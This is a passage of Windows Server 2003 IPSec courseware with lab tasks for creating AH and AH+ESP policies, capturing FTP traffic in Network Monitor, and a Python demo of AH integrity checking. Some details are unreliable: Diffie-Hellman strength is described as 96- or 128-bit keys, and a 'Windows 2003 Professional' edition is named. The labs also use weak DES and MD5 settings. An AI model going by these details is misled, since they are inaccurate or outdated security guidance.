Client (Respond Only): The policy of Client (Respond Only) is used for nor-
mal communication, which is not secured. What this means is that any
Windows 2003 machine (Professional or Server) with this policy enabled
will have the ability to communicate using IPSec if required or requested.
Such a machine will not enforce IPSec when initiating communications with
any other machine.
Secure Server (Require Security): The policy of Secure Server (Require
Security) is used when all IP network traffic is secured. What this means is
that any Windows 2003 machine (Professional or Server) with this policy
enabled will always enforce secure communications using IPSec. It will
never fall back to unsecured communications.
Server (Request Security): The policy of Server (Request Security) is used
when IP network traffic is to be secured, and to allow unsecured communica-
tion with clients that do not respond to the request. What this means is that
any Windows 2003 machine (Professional or Server) with this policy enabled
will first look to enforce communications using IPSec. If the other machine
cannot use IPSec, the first machine will fall back to unsecured
communications.
TASK 6B-2
Identifying Default IPSec Security Policies
Setup: You are logged on to Windows 2003 Server as Administrator,
the MMC is running, and the IP Security Policy Management
snap-in has been added.
1. In the left pane, select IP Security Policies On Local Machine. Three poli-
cies are shown in the right pane.
security policies: The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information.
These policies are also available in Windows XP.
2. Examine the three policies to see if any are currently assigned.
By default, they are not assigned.
3. Leave the MMC open for the next task.
Saving the Customized MMC Configuration
Since you have configured the MMC just as you wish, you should save this
configuration so that it is easy to bring back up. Although you can go through the
steps of adding the snap-in as you did earlier, to do so each time is cumbersome,
and is not required.
TASK 6B-3
Saving a Customized MMC
Setup: You are logged on to Windows 2003 Server as Administrator,
the MMC is running, and the IP Security Policy Management
snap-in has been added.
1. Choose File→Exit.
2. When you are asked if you wish to save the console settings, click Yes.
3. Save the file to the desktop as ipsec.mmc.msc.
4. Verify the new addition by double-clicking the new ipsec.mmc.msc file
on the desktop. Your saved MMC opens just as you had customized it to do
so.
The Secure Server (Require Security) Policy
In the following sections, you will examine the settings of each of the three
predefined policies. The most secure policy, Secure Server (Require Security), is the
policy that states that all communication must be secured, with no exceptions.
The General Tab
As the name implies, the General tab provides general information and
configuration options for the Secure Server (Require Security) policy.
Figure 6-2 shows the settings for Key Exchange. Keys are used as part of the
different forms of encryption that can be implemented in the IPSec policy. IKE
stands for Internet Key Exchange, and deals with the method of exchanging the
cryptographic key(s). SHA1 and MD5 are both algorithms that are used to verify
the integrity of a message. 3DES and DES are the actual encryption algorithms
that can be used, and nally, Diffie-Hellman Group will dictate the overall
strength of the encryption.
Figure 6-2: The Key Exchange Security Methods dialog box.
These settings work together to determine the integrity, condentiality, and
strength of the secured communication.
Integrity is determined by the SHA1 or MD5 algorithm.
Confidentiality is determined by the 3DES or DES algorithm.
Strength is determined by the Diffie-Hellman Group, which can be either
96-bit (the low setting) or 128-bit (the high setting) key lengths.
TASK 6B-4
Examining Security Methods
Setup: You are logged on to Windows 2003 Server as Administrator,
and the ipsec.mmc.msc console is open.
1. In the right pane, right-click Secure Server (Require Security), and
choose Properties.
2. Select the General tab.
3. Observe that the default value for Check For Policy Changes Every is 180
minutes. Every 3 hours, the machine (if it is a domain member) will check
with Windows Active Directory to see if this policy, when assigned, has
changed.
DES (Data Encryption Standard): Definition 1: An unclassified crypto algorithm adopted by the National Bureau of Standards for public use. Definition 2: A cryptographic algorithm for the protection of unclassified data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.
4. Under Perform Key Exchange Using Additional Settings, click Settings.
5. In the Key Exchange Settings dialog box, click Methods.
6. Examine the default settings for the security used in Secure Server
(Require Security).
7. Close all windows without changing the properties.
The Rules Tab for the Secure Server (Require Security)
Policy
The Rules section of an IPSec policy, in this case the Secure Server (Require
Security) policy, contains the actual security sections of the policy pertaining to
traffic and actions. The IP Filter List is used to define the types of network traffic
that are to be affected by this policy. The predefined rules in a policy can be
modified, but cannot be removed. The default rules are for All IP Traffic, All
ICMP Traffic, and <Dynamic>.
In addition to the IP Filter List is the Filter Action: in other words, what the
system does when traffic matches a rule's filter list, such as All IP Traffic. The
Rules tab of this policy shows three actions:
Permit: Allow unsecured IP packets to pass (the action applied to All ICMP Traffic).
Require Security: Requires secured communication, and refuses the connection if
the peer cannot negotiate it (the action applied to All IP Traffic).
Default Response: Follow the negotiations as initiated by the other computer.
This is especially useful when no other rule applies. In fact, it is the only
filter action for the Client (Respond Only) predefined policy.
Figure 6-3: The default filter lists and filter actions, as shown on the Require Security Rules
tab.
In addition to the IP Filter List and the Filter Actions on the Rules tab shown in
Figure 6-3, there are other sections that deserve noting. These are the
Authentication, Tunnel Setting, and Connection Type options, described in the
following section and shown in Figure 6-4.
The Authentication Methods are used to define how a trust will be established
between the two communicating hosts. By default, this is the Kerberos method.
The other valid options (in addition to Kerberos) are to use a certificate from a
Certificate Authority (CA), or to use a predefined shared key string (a preshared
key). Note that a preshared key is stored in the policy itself in clear text, readable
by anyone who can open the policy, so it is fine for a lab but is the weakest of
the three choices for production use.
The Tunnel Setting is used to define if this communication is to use a tunnel,
and if so, what the IP address for the end of the tunnel is. The endpoint is
the tunnel computer that is closest to the IP traffic destination.
The Connection Type is used to define the types of connections to which the
rule will apply. For example, the default setting is All Network Connections.
The second option is to have the rule apply only to Local Area Network
(LAN) traffic, and the third option is to have the rule only apply to Remote
Access traffic.
Figure 6-4: The authentication methods, tunnel settings, and connection types, as shown on
the Require Security Rules tab.
TASK 6B-5
Examining Policy Rules
Setup: You are logged on to Windows 2003 Server as Administrator.
1. Reopen the ipsec.mmc.msc console.
2. In the right pane, right-click Secure Server (Require Security), and
choose Properties.
3. If necessary, select the Rules tab.
LAN (Local Area Network): A computer communication system limited to no
more than a few miles and using high-speed connections (2 to 100 megabits per
second). A short-haul communication system that connects ADP devices in a
building or group of buildings within a few square kilometers, including
workstations, front-end processors, controllers, and servers.
4. Examine the default settings for IP Filter List, Filter Action,
Authentication Methods, Tunnel Setting, and Connection Type.
5. Select the All IP Traffic rule, and click the Edit button.
6. Observe the configuration options that can be adjusted in this section.
7. When you are done reviewing the configuration options, click Cancel to
close the Secure Server Properties, without making changes.
8. Close the ipsec.mmc.msc console without saving changes.
Topic 6C
IPSec AH Implementation
You now have all of the information and tools you need to be able to implement
IPSec. Let's try it out.
About the Tasks
For the following tasks, you will work in pairs. The text and activities refer to the
two machines as Student_P and Student_Q.
Student_P will initiate communication with Student_Q. Student_Q will dictate
whether it has an IPSec policy enabled. If so, it then determines if it should
request or require Student_P to do the same. On Student_P, at first you will have
no IPSec Respond policy activated, but later you will have a Respond policy. You
will capture traffic between these two computers using Network Monitor, and
perform an analysis on the traffic.
You will also use the options for configuring policies. You will use just the AH
protocol (authenticity/integrity). Then, you will use just the ESP protocol
(confidentiality). Following that, you will use AH with ESP. Also, ESP will be
configured to use its integrity algorithm. Finally, because the integrity algorithms
can be implemented in two flavors (SHA-1 or MD5) and the encryption
algorithms for confidentiality can also be implemented in two flavors (DES or
3DES), you'll use combinations of these.
As a policy maker for a company, you'll have to make such decisions before you
implement IPSec. These are the actual tools you can use in Windows 2003 to
implement your policies.
Creating Custom IPSec Policies
In the previous topic, you examined the default IPSec policies in Windows 2003.
For the remainder of the lesson, you will create and use your own customized
IPSec policies. This will enable you to fully create and secure network traffic
based on your unique configuration requirements. The following figures can be
used as a reference while performing the tasks of this section.
Figure 6-5: Opting not to use the Add Wizard.
When you are creating a new policy, you will need to add and configure all the
options you previously examined. In these tasks, you will be customizing the
policies, one by one, and do not want to use the Add Wizard, because the Add
Wizard will walk you through specific predefined steps. At this stage, you want to
perform everything manually.
Figure 6-6: The Security Methods tab, showing the leftmost part of the Security Method
Preference Order.
During policy creation, you will be presented with the Security Methods tab. At
this stage, you will see five columns presented: Type, AH Integrity, ESP
Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec), but you might need to
scroll to see all five.
Figure 6-7: The Security Methods tab, showing the right-most part of the Security Method
Preference Order.
Security methods are listed in order of preference that this machine will use when
attempting to negotiate IP Security when dealing with another machine that
responds that it can use IPSec, too. You can add, edit, or remove any of these
methods. In this case, since you will have named this policy 1_REQUEST_
AH(md5)_only, you will simplify the list and offer exactly one choice: Request IP
Security that relies only on AH Integrity using the MD5 hashing algorithm. Do
not worry about key lifetimes at this stage.
TASK 6C-1
Creating the 1_REQUEST_AH(md5)_only Policy
Note: Perform this task only if you are designated as Student_Q.
1. Open the ipsec.mmc.msc console.
2. In the right pane, right-click and choose Create IP Security Policy, then
click Next.
3. For the IP Security Policy Name, type 1_REQUEST_AH(md5)_only and
click Next.
4. Uncheck Activate The Default Response Rule and click Next.
5. Uncheck Edit Properties and click Finish.
6. Double-click the new policy 1_REQUEST_AH(md5)_only.
7. On the Rules tab, uncheck Use Add Wizard and click Add.
8. On the IP Filter List tab, click the radio button for All IP Traffic.
9. Switch to the Filter Action tab.
10. Click the radio button for Request Security (Optional).
11. Click Edit.
12. Verify that the radio button for Negotiate Security is selected.
13. Read the options presented to you under Security Method Preference
Order.
14. Remove all but one Security Method by holding down the Shift key,
selecting all but one of the choices, and clicking Remove. You can leave
any one of the Security Methods.
15. When prompted with Are You Sure?, click Yes.
16. Select the remaining method, and click Edit.
17. Under Security Method, click the Settings button found under Custom (For
Expert Users), as you're on your way to becoming an expert on IPSec.
18. Verify that AH is checked and that the integrity algorithm is MD5.
19. If necessary, uncheck ESP.
20. Under Session Key Settings, uncheck both check boxes.
21. Click OK three times to return to the New Rule Properties dialog box.
22. Leave the New Rule Properties open for the next task.
Editing Authentication Method Policies
When you are creating this customized policy, you are going to use only AH, and
not ESP. So, when you are customizing the settings, be sure to uncheck the ESP
options and to check the AH options. You should also clear the check boxes for
generating new keys, both for size (Kbytes) and time (seconds).
Figure 6-8: The Authentication Method tab.
Notice that three authentication methods are supported: Kerberos, Certificates, and
Preshared Keys. You will use the third method, as it is simple to implement, for
now. In a production environment, if you have a homogeneous Windows 2003
domain implementation, you could leave it at the default Kerberos; in a
heterogeneous network, you could choose to set up a CA and distribute IPSec
certificates. Avoid preshared keys in production: the string is stored in the policy
in clear text, and every host that shares it can impersonate any other.
TASK 6C-2
Editing the 1_REQUEST_AH(md5)_only Policy
Note: Perform this task only if you are designated as Student_Q.
1. Verify that the New Rule Properties are displayed.
2. Select the Authentication Methods tab.
3. Click Edit.
4. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide text for
the preshared key. Click OK to close the Edit Authentication Methods
Properties dialog box.
5. Switch to the Tunnel Setting tab, but leave the settings alone. You will be
working in Transport Mode only.
6. Switch to the Connection Type tab, but leave the settings alone. You will
use the default of All Network Connections.
7. Click Close to close the Rule Properties. Keep the Policy Properties open
for the next task.
Setting Up the Computer's Response
You have just configured a policy where Student_Q will request any other
computers that attempt to communicate with it to implement AH by using the
MD5 algorithm. Let's assume that this policy is put into effect, and another
computer says that it can communicate with Student_Q by using AH, as well.
Student_Q should be in a position to respond to this. Therefore, you should now
configure the Default Response rule in this policy for Student_Q.
Figure 6-9: Preparing to modify the default response.
To modify the rule, you will not use the Add Wizard. Once you click Edit, you
will again be presented with the tabs for Security Methods, Authentication
Methods, and Connection Types.
Figure 6-10: Editing security methods.
Under Security Methods, you will again see five columns presented: Type, AH
Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec). As
before, you can add, edit, or remove any of these methods.
In this case, this policy is named 1_REQUEST_AH(md5)_only, but because it will
also have to respond to the request it made, you'll simplify the list and offer
exactly one choice: Respond to IP Security that relies only on AH integrity using
the MD5 hashing algorithm. As before, you don't need to worry about the key
lifetimes.
TASK 6C-3
Configuring the Policy Response
Note: Perform this task only if you are designated as Student_Q.
1. Verify that the properties for the 1_REQUEST_AH(md5)_only policy
are displayed.
2. On the Rules tab, check <Dynamic> Default Response, and click Edit.
(The Use Add Wizard check box should remain unchecked.)
3. Remove all but one Security Method by holding down the Shift key,
selecting all but one of the choices, and clicking Remove.
4. When prompted with Are You Sure?, click Yes.
5. Select the remaining method, and click Edit.
6. Under Security Method, click the Settings button found under Custom.
7. Verify that the box beside AH is checked and that the integrity algo-
rithm is MD5.
8. Verify that ESP is unchecked.
9. Under Session Key Settings, verify that the options for generating new
keys for both size and time are unchecked.
10. Click OK twice to return to the Edit Rule Properties.
11. Switch to the Authentication Methods tab.
12. Click Edit.
13. Click the Use This String To Protect The Key Exchange (Preshared Key)
radio button, and in the box, type Purple Enigma to provide the text for
the preshared key.
14. Click OK twice to return to the policy properties.
15. Double-click All IP Traffic.
16. Switch to the Connection Type tab and verify that the setting is the
default of All Network Connections.
17. Click OK, and then click OK to close.
18. Close the ipsec.mmc.msc console without saving changes.
Configuring AH in Both Directions
You have configured a policy where Student_Q will request other computers that
attempt to communicate with it to implement AH by using the MD5 algorithm;
Student_Q is also in a position to respond by using this algorithm. Now, let's
configure Student_P to follow Student_Q's lead.
TASK 6C-4
Configuring the Second Computer
Note: Perform this task only if you are designated as Student_P.
1. Open the ipsec.mmc.msc console. In the right pane, right-click and choose
Create IP Security Policy. Click Next.
2. For the IP Security Policy Name, type 1_RESPOND_AH(md5)_only and
click Next.
3. Uncheck Activate The Default Response Rule and click Next.
4. Uncheck Edit Properties and click Finish.
5. Double-click the new policy 1_RESPOND_AH(md5)_only.
6. On the Rules tab, uncheck Use Add Wizard, check <Dynamic> Default
Response, and click Edit.
7. Remove all choices but one by holding down the Shift key, selecting all
but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method and click Edit.
10. Under Security Method, click the Settings button found under Custom
(For Expert Users).
11. Verify that AH is checked and that the integrity algorithm is MD5.
12. Verify that ESP is unchecked.
13. Under Session Key Settings, verify that the boxes for generating new keys
for both time and size are unchecked.
14. Click OK twice to return to the Rule Properties.
15. Switch to the Authentication Methods tab.
16. Click Edit.
17. Click the Use This String To Protect The Key Exchange (Preshared Key)
radio button, and in the box, type Purple Enigma to provide the text for
the preshared key.
18. Click OK.
19. Click OK twice, and then click Close to finish the creation of the policy.
20. Close the ipsec.mmc.msc console without saving changes.
Configuring FTP
Now that IPSec policies are configured on two machines, you need to test the
policies to ensure that they work as you intended them to work. To do this, you'll
bring up an FTP site on Student_Q and attempt to access this FTP site from
Student_P. You'll do this with IPSec implemented on one machine and then on
the other. You'll run Network Monitor to capture and record traffic between the
two machines. You'll examine these captures and see where (in the packet) the
IPSec headers reside. For greater clarity, we can verify this with the RFCs
associated with IPSec, as well.
TASK 6C-5
Setting Up the FTP Process
Note: Perform step 1 through step 17 only if you are designated as Student_Q.
1. Choose Start→Control Panel→Add Or Remove Programs.
2. Click the Add/Remove Windows Components button.
3. Click Application Server, and click the Details button.
4. Check the Internet Information Services (IIS) check box. Note that when
you select this option, COM+ is selected by default.
5. With IIS selected, click the Details button.
6. Check the File Transfer Protocol (FTP) Service check box and click OK.
Click OK again to return to the Windows Components screen.
7. Click Next. You may be prompted for your Windows Server 2003
CD-ROM.
8. Once the installation is complete, click Finish.
9. Close the Add Or Remove Programs window.
10. Choose Start→Administrative Tools→Internet Information Services
Manager.
11. In the left pane expand your Server name.
12. Expand FTP Sites, right-click Default FTP Site, and choose Properties.
13. Click the Home Directory tab and verify the location of the FTP folder.
The default location is C:\Inetpub\ftproot.
14. Close the IIS Manager.
15. In Explorer, locate and navigate to the folder designated as the FTP
home directory.
16. In this folder, create a text document. Edit this document to input some
text, and save it as text1.txt.
17. Create and save three more similar text documents in the same folder.
Use text2.txt, text3.txt, and text4.txt as the file names.
Note: Perform step 18 through step 23 only if you are designated as Student_P.
18. Open a command prompt.
19. Enter ftp IP_address_of_Student_Q to ftp to Student_Q's FTP
site.
20. Log on as anonymous with no password.
21. Verify that you can access the text documents created on the Student_Q
computer by using the DIR command.
22. Once you have verified that you can access the text documents, quit the ftp
session by entering bye at the ftp prompt.
23. Leave this command prompt open.
Implementing the IPSec Policy
You have just tested a plain text ftp session. The following tasks will walk you
through the process of implementing IPSec, and testing the results in both
directions. First, you will prove that you can connect, even though IPSec is
implemented on only one of the hosts.
TASK 6C-6
Implementing the 1_REQUEST_AH(md5)_only Policy
Note: Perform step 1 through step 4 only if you are designated as Student_Q.
1. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_
AH(md5)_only policy and choose Assign.
2. Close the ipsec.mmc.msc console. If you are prompted to save changes,
click No.
3. Start Network Monitor, and verify that it is going to collect packets
from the interface connected to Student_P.
4. Start a new capture, and allow Network Monitor to capture packets
until Student_P has completed step 5 through step 9.
Note: Perform step 5 through step 9 only if you are designated as Student_P.
5. At the command prompt, again enter ftp
IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q after a very brief delay,
even though an IPSec policy is assigned on Student_Q.
6. Log on as anonymous with no password.
7. Enter dir to see a list of files hosted on the ftp site.
8. Exit the ftp session.
9. Leave the command prompt open.
Request-only Session Analysis
Why was your attempt successful? What is the reason for the brief delay? This is
because the policy is designed to request only (not demand) IPSec. If the
remote machine trying to communicate with Student_Q is not IPSec-aware or
does not have a policy assigned to do so, then Student_Q will fall back to
regular, insecure IP. The brief delay occurred because Student_Q was trying to
establish an IPSec communication with Student_P before giving up. This fallback
is the security trade-off of a Request Security (Optional) action: any peer that
simply ignores the IKE negotiation gets a clear-text session, so use Require
Security wherever the peers are known to support IPSec.
You will be using Network Monitor repeatedly throughout this course, so you
might want to create a shortcut for it on the Windows desktop.
TASK 6C-7
Analyzing the Request-only Session
Note: Perform this task only if you are designated as Student_Q.
1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2),
Student_P attempts to initiate a three-way handshake with Student_Q (in
frame 3). Because the policy on Student_Q says to request IPSec communi-
cation, Student_Q begins the negotiation process (in frame 4).
3. In frame 4, observe that the protocol is ISAKMP (UDP port 500). When it
does not hear from Student_P, it tries again approximately a second later.
When it does not hear from Student_P again, it falls back to insecure
communication, and the three-way handshake proceeds as before (in frames 6,
7, and 8). Once the connection is made, the session is established in clear
text, with no IPSec. You are able to see the payload and full headers of all
the packets, with no evidence of IPSec.
4. Close Network Monitor. You can save your capture to a le, if you like.
Implementing a Request-and-Respond Policy
In the previous task, you saw that even though you had IPSec enabled in one
direction, the policy allowed for unsecured communication. When Student_P
responded with no IPSec, Student_Q went ahead and accepted the session, and
traffic continued without IPSec. In the next task, you will configure Student_P to
respond to Student_Q's IPSec policy.
TASK 6C-8
Configuring a Request-and-Respond IPSec Session
Note: Perform step 1 only if you are designated as Student_P.
1. Open your ipsec.mmc.msc console. Right-click 1_RESPOND_AH(md5)_
only policy, and choose Assign. Close the ipsec.mmc.msc console, without
saving changes.
Then, wait until Student_Q performs the next step.
Note: Perform step 2 only if you are designated as Student_Q.
2. Activate Network Monitor, and start a capture.
Note: Perform the rest of this task only if you are designated as Student_P.
Based on your network traffic, you might have different frame numbers in your
packet captures.
For this step, and subsequent steps that deal with the ISAKMP protocol, your
classroom configuration might not yield the expected results, due to timing
issues as the students complete their assigned steps. You can have them try to
restart the computer, and then try redoing the activity.
3. At the command prompt, again enter ftp
IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of files hosted on the ftp site.
6. Exit the ftp session.
7. Close the command prompt.
Request-and-Respond Session Analysis
In the second attempt at communication, the temporary delay that was visible in
the earlier task was not present. This is because the second host was now able to
respond to the IPSec request initiated by the ftp server. There was no need to
move down the list to a different method of communication, therefore, saving a
bit of time. In the following task, you will use Network Monitor to analyze this
session, and to see how the IPSec policy was implemented.
Some things to look for during this analysis include:
IP identifies AH with a protocol ID of 0x33 (51).
AH identifies TCP with a Next Header of 0x6 (6).
TCP identifies FTP with a destination port of 0x15 (21).
TASK 6C-9
Analyzing the Request-and-Respond Session
Note: Perform this task only if you are designated as Student_Q. Student_P is
advised to follow along.
1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2),
Student_P attempts to initiate a three-way handshake with Student_Q (in
frame 3).
3. Observe that, because the policy on Student_Q says to request IPSec
communication, Student_Q begins the negotiation process (in frame 4) by using
the ISAKMP protocol (UDP port 500).
4. Observe that, when Student_P agrees to comply with the IPSec request (in
frame 5), there is an ISAKMP interplay between the two machines for the
next few frames to negotiate and establish the IPSec protocol.
5. Observe that the actual three-way handshake is now completed in frames 14
and 15. If your network traffic is different, your frame numbers will be
different.
Based on your network traffic, you might have different frame numbers in your
packet captures. ARP and ISAKMP may be different on your system.
6. Observe that, from frame 16 onward until the session teardown, the AH
ensures integrity of communication between the two machines.
7. Double-click a frame whose protocol is identied by Network Monitor as
FTP.
8. Observe the sequence of protocol identification: Ethernet, then IP, then AH,
then TCP, then FTP. As noted earlier:
Ethernet identifies the protocol IP with an Ethertype of 0x800.
IP identifies AH with a protocol ID of 0x33 (51).
AH identifies TCP with a Next Header of 0x6 (6).
TCP identifies FTP with a destination port of 0x15 (21).
9. Observe that there is no encryption: AH only authenticates the packet (it
carries an HMAC-MD5 integrity check value computed over the payload and the
fields of the IP header that do not change in transit); it does not encrypt it.
10. In fact, look around frame 33. Near there, you should be able to see the
name of the text file in response to the dir (LIST) command.
11. Close Network Monitor. You can save your capture to a le if you like.
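The integrity check that AH adds, as an added example (this is not code from the course or from Windows): the following Python builds a transport-mode IPv4/AH/TCP packet carrying the FTP LIST command, computes the HMAC-MD5-96 integrity check value the way RFC 2402 and RFC 2403 specify (mutable IP header fields and the ICV field zeroed before hashing), verifies it, and then shows that the FTP command stays readable on the wire while any change to the authenticated data, or use of a different key, is detected. The addresses, SPI, key and TCP segment are constructed for the example; in a real session IKE derives the AH key from the Kerberos, certificate or preshared-key authentication you configured.

```python
import hashlib
import hmac
import struct

# Constructed values for this example (assumptions, not values from the course):
SRC = bytes([192, 168, 1, 10])        # Student_P
DST = bytes([192, 168, 1, 20])        # Student_Q
AH_KEY = b"constructed-hmac-md5-key"  # in practice IKE derives this per SA
SPI = 0x1000ABCD
IP_PROTO_AH = 51
NEXT_HEADER_TCP = 6
ICV_LEN = 12                          # HMAC-MD5-96: 16-byte MAC truncated to 96 bits (RFC 2403)
AH_LEN = 12 + ICV_LEN                 # fixed AH fields plus ICV


def ip_checksum(hdr: bytes) -> int:
    """Standard one's-complement checksum over the IPv4 header."""
    total = sum((hdr[i] << 8) + hdr[i + 1] for i in range(0, len(hdr), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(total_len: int, ttl: int = 128) -> bytes:
    """IPv4 header for transport mode: the protocol field points at AH (51)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000,
                      ttl, IP_PROTO_AH, 0, SRC, DST)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]


def build_tcp_segment(sport: int, dport: int, data: bytes) -> bytes:
    """Minimal PSH/ACK segment; the TCP checksum is left zero (not validated here)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + data


def zero_mutable_ip_fields(ip_hdr: bytes) -> bytes:
    """RFC 2402: TOS, flags/fragment offset, TTL and header checksum may change
    in transit, so they are zeroed before the ICV is computed."""
    h = bytearray(ip_hdr)
    h[1] = 0
    h[6:8] = b"\x00\x00"
    h[8] = 0
    h[10:12] = b"\x00\x00"
    return bytes(h)


def ah_icv(ip_hdr: bytes, ah_fixed: bytes, payload: bytes, key: bytes) -> bytes:
    """ICV = HMAC-MD5 over (immutable IP header + AH header with ICV zeroed + payload), truncated."""
    covered = zero_mutable_ip_fields(ip_hdr) + ah_fixed + b"\x00" * ICV_LEN + payload
    return hmac.new(key, covered, hashlib.md5).digest()[:ICV_LEN]


def build_ah_packet(tcp_segment: bytes, seq: int, key: bytes) -> bytes:
    ip_hdr = build_ipv4_header(20 + AH_LEN + len(tcp_segment))
    # Payload Len is the AH length in 32-bit words minus 2: (24 / 4) - 2 = 4
    ah_fixed = struct.pack("!BBHII", NEXT_HEADER_TCP, AH_LEN // 4 - 2, 0, SPI, seq)
    return ip_hdr + ah_fixed + ah_icv(ip_hdr, ah_fixed, tcp_segment, key) + tcp_segment


def verify_ah_packet(pkt: bytes, key: bytes) -> bool:
    """Recompute the ICV from the received packet and compare in constant time."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr = pkt[:ihl]
    if ip_hdr[9] != IP_PROTO_AH:
        return False
    ah_total = (pkt[ihl + 1] + 2) * 4
    ah_fixed = pkt[ihl:ihl + 12]
    icv = pkt[ihl + 12:ihl + ah_total]
    payload = pkt[ihl + ah_total:]
    return hmac.compare_digest(icv, ah_icv(ip_hdr, ah_fixed, payload, key))


def demo() -> dict:
    segment = build_tcp_segment(1035, 21, b"LIST\r\n")     # the FTP dir command
    pkt = build_ah_packet(segment, seq=1, key=AH_KEY)
    results = {"valid": verify_ah_packet(pkt, AH_KEY)}
    # AH authenticates but does not encrypt: the command is still readable on the wire.
    results["cleartext_visible"] = b"LIST" in pkt
    # A router decrementing TTL must not break the ICV (TTL and checksum are mutable).
    hopped = bytearray(pkt)
    hopped[8] -= 1
    results["survives_ttl_change"] = verify_ah_packet(bytes(hopped), AH_KEY)
    # Any change to the authenticated data is detected (LIST rewritten to RETR).
    tampered = bytearray(pkt)
    tampered[-6:-2] = b"RETR"
    results["tamper_detected"] = not verify_ah_packet(bytes(tampered), AH_KEY)
    # Mismatched keys (peers that derived different SA keys) fail verification.
    results["wrong_key_rejected"] = not verify_ah_packet(pkt, b"some-other-key")
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

Because the outer IP header is covered by the ICV, AH in transport mode breaks behind NAT, which is one reason production deployments usually rely on ESP with its own integrity algorithm instead of AH.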
Topic 6D
Combining AH and ESP in IPSec
In the previous topic, you examined the implementation of AH in Windows
Server 2003, including viewing packet data in Network Monitor. Windows Server
2003 can still negotiate ESP on its own (the predefined Secure Server (Require
Security) policy, for example, uses ESP with 3DES and SHA1 and no AH), but
the policies in this topic leave ESP's integrity algorithm set to <None>, so AH is
paired with ESP to keep an integrity check on every packet. In the following
section of tasks, you will enable different options in the establishment of IPSec
between two computers.
You have configured and analyzed IPSec traffic by using AH. In this topic, you
will configure and analyze network traffic that combines AH and ESP. When you
are using both AH and ESP, you are configuring IPSec to provide both integrity
(covering the IP header as well as the payload) and confidentiality.
TASK 6D-1
Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec
Policy and the Response Policy
Note: Perform this task only if you are designated as Student_Q. Student_P is
advised to follow along.
1. Open your ipsec.mmc.msc console. In the right pane, unassign the cur-
rent policy, and then create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, type 5_REQUEST_AH(md5)+ESP(des)
and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click
Add.
7. On the IP Filter List tab, select the All IP Traffic radio button.
8. Switch to the Filter Action tab.
9. Select the Request Security (Optional) radio button.
10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. Read the options presented to you under Security Method Preference
Order.
13. Remove all but one method by holding the Shift key, selecting all but
one of the choices, and clicking Remove. Some configurations might have
only one option. If so, skip the next step.
14. When prompted with Are You Sure?, click Yes.
15. Select the remaining method, and click Edit.
16. Under Security Method, click the Settings button found under Custom.
17. Verify that AH is checked.
18. Select the integrity algorithm MD5.
19. Verify that ESP is checked.
20. Leave ESPs integrity algorithm set to <None>.
21. For Encryption Algorithm, select DES.
22. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
23. Click OK three times to return to the Rule Properties.
24. Switch to the Authentication Methods tab.
25. Click Edit.
26. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
27. Click OK, and then click Close to return to the Policy Properties.
28. On the Rules tab, check <Dynamic> Default Response, and click Edit.
The Use Add Wizard check box should remain unchecked.
29. Under Security Methods, hold the Shift key, select all but one of the
choices, and click Remove.
30. Select the remaining method, and click Edit.
31. Under Security Method, click the Settings button found under Custom.
32. Verify that AH is checked.
33. Select the integrity algorithm MD5.
34. Verify that ESP is checked.
35. Leave ESPs integrity algorithm set to <None>.
36. For Encryption Algorithm, select DES.
37. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
38. Click OK twice to return to the Rule Properties.
39. Switch to the Authentication Methods tab.
40. Click Edit.
41. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
42. Click OK three times to close the Policy Properties.
43. Close the console without saving settings.
Configuring the IPSec Response
You have configured a policy where Student_Q will request other computers that
attempt to communicate with it to implement AH by using the MD5 integrity
algorithm and ESP by using the DES encryption algorithm; Student_Q is also in
a position to respond by using this combination. Let's configure Student_P to
follow Student_Q's lead.
TASK 6D-2
Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec
Policy
Note: Perform this task only if you are designated as Student_P. Student_Q is
advised to follow along.
1. Open your ipsec.mmc.msc console. In the right pane, create another IP
Security Policy. Click Next.
2. For the IP Security Policy Name, type 5_RESPOND_AH(md5)+ESP(des)
and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check
<Dynamic> Default Response, and click Edit.
7. Remove all but one security method by holding the Shift key, selecting
all but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom.
11. Verify that AH is checked.
12. Select the integrity algorithm MD5.
13. Verify that ESP is checked.
14. Leave ESPs integrity algorithm set to <None>.
15. For Encryption Algorithm, select DES.
16. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
17. Click OK twice to return to the Rule Properties.
